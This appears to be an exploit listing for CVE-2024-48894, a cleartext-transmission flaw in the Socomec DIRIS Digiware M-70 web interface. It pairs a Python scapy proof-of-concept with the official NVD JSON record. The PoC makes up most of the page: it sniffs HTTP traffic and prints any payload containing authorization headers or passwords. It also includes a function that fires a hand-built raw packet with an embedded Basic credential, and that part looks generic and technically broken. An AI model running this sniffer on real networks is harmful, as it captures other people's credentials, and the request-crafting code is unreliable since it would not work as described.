CVE-2024-48894

# CVE-2024-48894 PoC - Cleartext Transmission in Socomec DIRIS Digiware WEBVIEW-M # This PoC demonstrates sniffing network traffic to capture sensitive information # Note: This is for educational and authorized testing purposes only import scapy.all as scapy from scapy.layers import http def capture_cleartext_http_traffic(packet): """ Capture cleartext HTTP traffic from Socomec DIRIS Digiware M-70 This PoC demonstrates how sensitive information can be sniffed """ # Check if packet contains HTTP layer if packet.haslayer(http.HTTPRequest): http_layer = packet.getlayer(http.HTTPRequest) # Log HTTP request details print(f"[+] HTTP Request Detected") print(f" Method: {http_layer.Method.decode()}") print(f" Host: {http_layer.Host.decode()}") print(f" Path: {http_layer.Path.decode()}") # Check for Authorization header (potential credentials) if packet.haslayer(scapy.Raw): payload = packet.getlayer(scapy.Raw).load try: decoded_payload = payload.decode('utf-8', errors='ignore') if 'Authorization' in decoded_payload or 'password' in decoded_payload.lower(): print(f"[!] POTENTIAL SENSITIVE DATA FOUND:") print(decoded_payload[:500]) except: pass def start_sniffing(interface='eth0', count=100): """ Start packet sniffing on specified interface Args: interface: Network interface to sniff on count: Number of packets to capture """ print(f"[*] Starting packet capture on {interface}") print(f"[*] Watching for cleartext HTTP traffic to DIRIS Digiware") # Filter for HTTP traffic (port 80) scapy.sniff(iface=interface, count=count, prn=capture_cleartext_http_traffic, filter='tcp port 80') # Example: Send crafted HTTP request to trigger vulnerability def send_crafted_request(target_ip): """ Send crafted HTTP request to WEBVIEW-M endpoint """ from scapy.all import IP, TCP, Raw, send # Craft HTTP GET request to WEBVIEW-M http_request = b"GET /webview-m/api/status HTTP/1.1\r\nHost: " http_request += target_ip.encode() http_request += b"\r\nAuthorization: Basic dXNlcjpwYXNz\r\n" http_request += b"Connection: close\r\n\r\n" # Send packet ip_layer = IP(dst=target_ip) tcp_layer = TCP(dport=80, sport=12345, flags='PA') packet = ip_layer / tcp_layer / Raw(load=http_request) print(f"[*] Sending crafted request to {target_ip}") send(packet, verbose=0) if __name__ == "__main__": # Replace with actual target IP TARGET_IP = "192.168.1.100" # Option 1: Capture existing traffic # start_sniffing(interface="eth0", count=1000) # Option 2: Send crafted request # send_crafted_request(TARGET_IP) print("CVE-2024-48894 PoC - Cleartext Transmission") print("Target: Socomec DIRIS Digiware M-70 WEBVIEW-M")

{"cve": {"id": "CVE-2024-48894", "sourceIdentifier": "[email protected]", "published": "2025-12-01T16:15:50.160", "lastModified": "2025-12-05T21:10:30.213", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A cleartext transmission vulnerability exists in the WEBVIEW-M functionality of Socomec DIRIS Digiware M-70 1.6.9. A specially crafted HTTP request can lead to a disclosure of sensitive information. An attacker can sniff network traffic to trigger this vulnerability."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-319"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:socomec:diris_m-70_firmware:1.6.9:*:*:*:*:*:*:*", "matchCriteriaId": "C07608BE-E7E3-44F5-AE9A-4AE36679F58A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:socomec:diris_m-70:-:*:*:*:*:*:*:*", "matchCriteriaId": "153A9D26-2C76-4B6B-AFD8-22DEB2081F34"}]}]}], "references": [{"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2024-2115", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.socomec.fr/sites/default/files/2025-04/CVE-2024-48894---Diris-Digiware-Webview-_VULNERABILITIES_2025-04-11-17-22-18_English_0.pdf", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2024-2115", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Vendor Advisory"]}]}}